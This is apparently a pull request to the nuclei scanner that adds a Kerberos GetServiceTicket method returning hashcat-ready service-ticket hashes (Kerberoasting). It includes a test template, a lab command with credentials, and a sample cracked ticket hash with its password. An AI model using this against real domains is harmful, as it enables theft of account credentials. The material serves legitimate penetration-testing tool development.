### PR TITLE
add method GetServiceTicket to the kerberos module

### DIFF
--- a/pkg/js/libs/kerberos/kerberos.go
+++ b/pkg/js/libs/kerberos/kerberos.go
@@ -168,7 +168,7 @@ func (c *KerberosClient) GetServiceTicket(domain, controller string, username, p
 		return tgs, err
 	}
 
-	hashcat, err := tgsToHashcat(ticket)
+	hashcat, err := tgsToHashcat(ticket, target)
 	if err != nil {
 		return tgs, err
 	}
@@ -179,10 +179,10 @@ func (c *KerberosClient) GetServiceTicket(domain, controller string, username, p
 	}, nil
 }
 
-func tgsToHashcat(tgs messages.Ticket) (string, error) {
+func tgsToHashcat(tgs messages.Ticket, username string) (string, error) {
 	return fmt.Sprintf("$krb5tgs$%d$*%s$%s$%s*$%s$%s",
 		tgs.EncPart.EType,
-		"",
+		username,
 		tgs.Realm,
 		strings.Join(tgs.SName.NameString[:], "/"),
 		hex.EncodeToString(tgs.EncPart.Cipher[:16]),

--- a/pkg/js/libs/kerberos/kerberos.go
+++ b/pkg/js/libs/kerberos/kerberos.go
@@ -97,6 +97,7 @@ func (c *KerberosClient) EnumerateUser(domain, controller string, username strin
 		return resp, err
 	}
 	cl := kclient.NewWithPassword(username, opts.realm, "foobar", opts.config, kclient.DisablePAFXFAST(true))
+	defer cl.Destroy()
 
 	req, err := messages.NewASReqForTGT(cl.Credentials.Domain(), cl.Config, cl.Credentials.CName())
 	if err != nil {
@@ -162,6 +163,7 @@ func (c *KerberosClient) GetServiceTicket(domain, controller string, username, p
 		return tgs, err
 	}
 	cl := kclient.NewWithPassword(username, opts.realm, password, opts.config, kclient.DisablePAFXFAST(true))
+	defer cl.Destroy()
 
 	ticket, _, err := cl.GetServiceTicket(spn)
 	if err != nil {


### PR DESCRIPTION
## Proposed changes

Closes #4421

With this change, a new method is exposed in the kerberos module of the Javascript Protocol: `GetServiceTicket()`. This method returns a `TGS` struct, which looks like this:

```go
type TGS struct {
	Ticket messages.Ticket
	Hash   string
}
```

`Hash` contains the Hashcat formatted string representing the ticket, ready to be cracked. To test this feature I used the same environment of #4420. And used this template:

```yaml
id: get-service-ticket

info:
  name: test
  author: 5amu
  severity: info

javascript:
  - args:
      DomainController: "{{Host}}"
    code: |
      krb = require("nuclei/kerberos");
      client = krb.KerberosClient();
      ticket = client.GetServiceTicket(template.Domain, DomainController, template.Username, template.Password, template.TargetUser, template.SPN);
      to_json(ticket);
    extractors:
      - type: json
        json:
          - '.Hash'

```

And executed nuclei like this:

```bash
go run cmd/nuclei/main.go -u 192.168.56.10 -var Username=victim -var Password=Trust_Me_Br0 -var Domain=LAB.LOCAL -var TargetUser=roastme -var SPN=DC01/cifs -t .\test-krb5.yaml
```

![image](https://github.com/projectdiscovery/nuclei/assets/39925709/304eba1f-ba2a-4387-9221-879be9bd9067)

Which returns an hash understandable by hashcat:

```
$krb5tgs$23$*$LAB.LOCAL$DC01/cifs*$8b6b8c0992fab0e595652f98d2fd6e7e$0260f7d605e3d74a97018484dd38f099b76d6a6e5cde686715bb8b0ef027f382f938321a817f456a36b12625549be649ebb52adf9991c88375ec34050495bad3f6f9d22275dd2b2af54c48fbd188cd39108bc5c174e401997399ac17ae3d2fa04b094abcd35c3bc6ff15a81cd5e703ceb98564af6efb016a0737c5a2fee1bca516b1ad6e62085187457e2c32ca0ddfdf9e210ddf494284a5a4b6bd6a0c22221e9023ab476f2be777be9ef5c0175fda7014d63eddbdcdf7eb16b9ba00e24d9ad9abd6176a3c626531676ffc1e3c189bac0163d743b1d284416b5b795ba1449deab5851f2f42e54c8060a755ef8ef3334ac2e580d50a58f45dff11b52268b6500dca40324d98f25a8ea6d8dbd356d095916a6635bd2ddaf1f9d6dcc575714ded1cbe3addf56e8365cd3572b9099f98ad9130c246c8954ee47d48f3ae76c9e04d87fabfd4b0c65f7887fddb09066bc32085b0b8204e9739df5c3988677d06340cd161303185c7a3d4868aea0196c7b1ac01899471a436ca1cb9964f55a8ada950060c51c6f3529d76c72fcea2b14be308adb089d536dcd85f2bfb307b4e2ab7d0250db92163c14182805df0d5767ff218015dd0c6057fc4c798a2843e4e3c5b6f5e4db7e1c9d2017143ad8cbc64f7987fcfc98685c1ea240df942b811f1bb409b2ef91233b8510f019a4667f2617408fbdc7b2c532b69a078f045de376837e2fb54a714ec09dcd12493365d6ba046352547b6359351370ba9bbaa0cb948a488c3eaa969dd76d07662c4e0e71067523aabf1348d91dd0f3a272a0c945d3592b01840cb87c8ee088d288b9e213e00e1bf46aa85a4b42d37ac442efe98e9d8ea85db7ff688aada8162169cce963b40f94b99e32224eb553005ec07145be516ee692fc1bd36884c5864c805e2e8ea820ed07c499572780a6b527e806fa76b8bb78b1eda6ae0b8b3d14c4ee38200d955dc654b6df7ec60d04a1fb986ddc9cdf29a764702434f5651a01bd4543acfa1e435e24c01107699a559852463681fdc953640816084b7f72ed0c4df0042f9fc48f33afcaa6f67847e462910803cc133e8edf407dffb2c1c5e6cdcb534709bc68fa1243565f62732da54c37d4195198d1e40fae9c6d27ae828be725d55528ea22ac10b20461df2c6e8200c499455d850f33751cc7a7f261a036162fed20aabe8c4cff38d5e483c966a57aba8295faab38a2dbc661753174dc53e684fa21e7583de30020f3e1ce937995f97c630835ddc7292121e0876d97151ca62dd32036060ef7a139f1aeb04591a1fc5550c83bd53c42cb5e8d156b6071027982f7ed80335b1109dbe2df627f55c8a:!Qazxsw2
```

## Checklist

- [x] Pull request is created against the [dev](https://github.com/projectdiscovery/nuclei/tree/dev) branch
- [ ] All checks passed (lint, unit/integration/regression tests etc.) with my changes
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] I have added necessary documentation (if appropriate)